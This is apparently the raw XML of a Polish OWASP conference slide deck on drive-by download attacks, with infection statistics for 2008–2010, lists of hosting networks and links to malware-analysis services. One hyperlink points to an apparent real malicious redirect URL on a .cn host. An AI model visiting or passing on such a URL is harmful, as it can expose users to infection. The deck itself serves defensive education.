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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr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Liczba infekcji 2008 - 2010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areaChart>
        <c:grouping val="standard"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>label 0</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Kolumna C</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="ccffff"/>
            </a:solidFill>
            <a:ln w="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="0"/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8"/>
                <c:pt idx="0">
                  <c:v>Paź</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Lis</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Gru</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Sty</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Lut</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Mar</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Kwi</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>maj</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Cze</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Lip</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Sie</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Wrz</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>Paź</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>Lis</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>Gru</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>Sty</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>Lut</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>Mar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8"/>
                <c:pt idx="0">
                  <c:v>52</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>43</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>269</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1904</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>7223</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2061</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>627</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>10920</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1006</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2993</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>8822</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2305</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>272</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>554</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>4202</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>734</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="78490428"/>
        <c:axId val="91317870"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="78490428"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="t"/>
        <c:numFmt formatCode="[$-409]mm/dd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17870"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="91317870"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="r"/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90428"/>
        <c:crosses val="max"/>
        <c:crossBetween val="midCat"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln w="0">
          <a:solidFill>
            <a:srgbClr val="b3b3b3"/>
          </a:solidFill>
        </a:ln>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="0"/>
    <c:dispBlanksAs val="zero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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr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Liczba infekcji plików domeny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Kolumna B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General" sourceLinked="0"/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4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  <c:pt idx="9">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>19</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>22</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>29</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>35</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>37</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>38</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>40</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>41</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>42</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>43</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>4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4"/>
                <c:pt idx="0">
                  <c:v>108</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>116</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>127</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>128</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>133</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>144</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>145</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>152</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>158</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>170</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>172</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>180</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>181</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>212</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>224</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>224</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>231</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>237</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>256</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>262</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>271</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>289</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>302</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>318</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>332</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>353</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>415</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>440</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>511</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>605</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>650</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>671</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>692</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>712</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>790</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>1035</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>1101</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>1102</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>1996</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>2079</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>2081</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>3952</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>7131</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>9619</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:gapWidth val="100"/>
        <c:overlap val="0"/>
        <c:axId val="82436968"/>
        <c:axId val="33044709"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="82436968"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr rot="0"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr b="0" sz="900" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0" sz="900" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                  </a:rPr>
                  <a:t>Domena</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
          <c:spPr>
            <a:noFill/>
            <a:ln w="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044709"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="330447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title>
          <c:tx>
            <c:rich>
              <a:bodyPr rot="-5400000"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr b="0" sz="900" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0" sz="900" spc="-1" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                  </a:rPr>
                  <a:t>Liczba infekcji</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
          <c:spPr>
            <a:noFill/>
            <a:ln w="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369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4948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49680" cy="34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4080" cy="40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4948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4948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54CBF6-6FB3-4696-86A9-469EC6EBD4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96920"/>
            <a:ext cx="820728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072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06640"/>
            <a:ext cx="82072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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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06640"/>
            <a:ext cx="400500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2720" y="3806640"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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240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2080" y="1294920"/>
            <a:ext cx="264240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6960" y="1294920"/>
            <a:ext cx="264240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06640"/>
            <a:ext cx="264240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2080" y="3806640"/>
            <a:ext cx="264240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6960" y="3806640"/>
            <a:ext cx="264240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96920"/>
            <a:ext cx="820728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072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6920"/>
            <a:ext cx="820728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0728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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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196920"/>
            <a:ext cx="820728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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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06640"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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072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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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2720" y="3806640"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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06640"/>
            <a:ext cx="82072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96920"/>
            <a:ext cx="820728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072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806640"/>
            <a:ext cx="82072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6920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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06640"/>
            <a:ext cx="400500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2720" y="3806640"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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240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2080" y="1294920"/>
            <a:ext cx="264240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06960" y="1294920"/>
            <a:ext cx="264240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806640"/>
            <a:ext cx="264240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2080" y="3806640"/>
            <a:ext cx="264240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06960" y="3806640"/>
            <a:ext cx="264240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96920"/>
            <a:ext cx="820728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0728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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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96920"/>
            <a:ext cx="820728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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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06640"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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2720" y="3806640"/>
            <a:ext cx="400500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96920"/>
            <a:ext cx="820728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0500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2720" y="1294920"/>
            <a:ext cx="400500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06640"/>
            <a:ext cx="82072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6920"/>
            <a:ext cx="820728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0728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711840"/>
            <a:ext cx="9144000" cy="1526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77320" y="6248520"/>
            <a:ext cx="380880" cy="3492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689440" y="6270480"/>
            <a:ext cx="23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Tahoma"/>
              </a:rPr>
              <a:t>OWA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447920" y="762120"/>
            <a:ext cx="7696080" cy="4952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76720" y="762120"/>
            <a:ext cx="5844960" cy="18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715000"/>
            <a:ext cx="9144000" cy="114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676520" y="1066680"/>
            <a:ext cx="1371600" cy="1258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038480" y="5165640"/>
            <a:ext cx="419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Copyright 2007 © The OWASP Found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Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP Licen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09480"/>
            <a:ext cx="9144000" cy="152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80" y="755640"/>
            <a:ext cx="1417680" cy="3740040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003399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0" y="5302080"/>
            <a:ext cx="1417680" cy="412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80" y="4844880"/>
            <a:ext cx="1417680" cy="56520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80" y="2666880"/>
            <a:ext cx="1417680" cy="1219320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0033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5260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700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641680"/>
            <a:ext cx="914400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59371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The OWASP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4628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5040" y="2666880"/>
            <a:ext cx="1028880" cy="1219320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="456" h="528">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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0800000">
            <a:off x="7385040" y="2688840"/>
            <a:ext cx="1028880" cy="1219320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="456" h="528">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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4229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OWA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07280" cy="450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oogle.com/safebrowsing/diagnostic?site" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stopbadware.org/reports/ip" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stopbadware.org/reports/asn" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.malwaredomainlist.com/mdl.php" TargetMode="External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microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name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homenameworld.cn:8080/ts/in.cgi?pepsi21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mailto:t@p" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:o#$@m" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:!%5E!@u" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:c!@o" TargetMode="External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stopbadware.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://unmaskparasites.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://malzilla.sourceforge.net/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wepawet.iseclab.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://virustotal.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://virusscan.jotti.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://anubis.iseclab.org/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badwarebusters.org/community/submit" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/research/tools/caffeinemonkey.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/safebrowsing/report_badware/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1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Ataki drive-by downloa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343400" y="3260520"/>
            <a:ext cx="373392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Tahoma"/>
              </a:rPr>
              <a:t>Filip Palian</a:t>
            </a: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Tahoma"/>
              </a:rPr>
              <a:t>filip.palian@pjwstk.edu.pl</a:t>
            </a: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514520" y="4648320"/>
            <a:ext cx="184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Tahoma"/>
              </a:rPr>
              <a:t>Education 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49400"/>
            <a:ext cx="822636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kala problemu (fastpark.net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720720" y="1440000"/>
            <a:ext cx="7535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www.google.com/safebrowsing/diagnostic?site=AS:137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360" y="1967040"/>
            <a:ext cx="91346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49400"/>
            <a:ext cx="822636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kala problemu c.d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1295280"/>
            <a:ext cx="822636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725400" indent="-268200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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>GoDaddy (AS2649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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Dreamhost (AS2634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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Akamai (AS2094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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Microsoft (AS807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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Google (AS1516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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
